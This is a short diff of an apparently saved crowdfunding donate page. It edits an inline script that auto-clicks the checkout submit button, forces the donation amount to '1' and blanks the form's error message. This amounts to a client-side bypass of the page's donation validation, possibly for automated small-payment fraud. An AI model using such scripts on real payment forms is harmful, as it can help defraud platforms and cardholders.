--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -1336,7 +1336,7 @@
 	 <script>
 		 function change(){
 	document.querySelector("#root > div > main > div > div > div.l-checkout-single-page.disp-flex.align-center > div > form > button").click();
-	document.querySelector("#checkout-donation").value = "1";
+	document.querySelector("#checkout-donation").setAttribute("value", "1");
 	document.querySelector("#root > div > main > div > div > div.l-checkout-single-page.disp-flex.align-center > div > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field.m-currency-field--error > div.m-form-field-alert.mt-half.a-field-alert.a-field-alert--error > span").innerHTML = '';
 		 }
 	 </script>
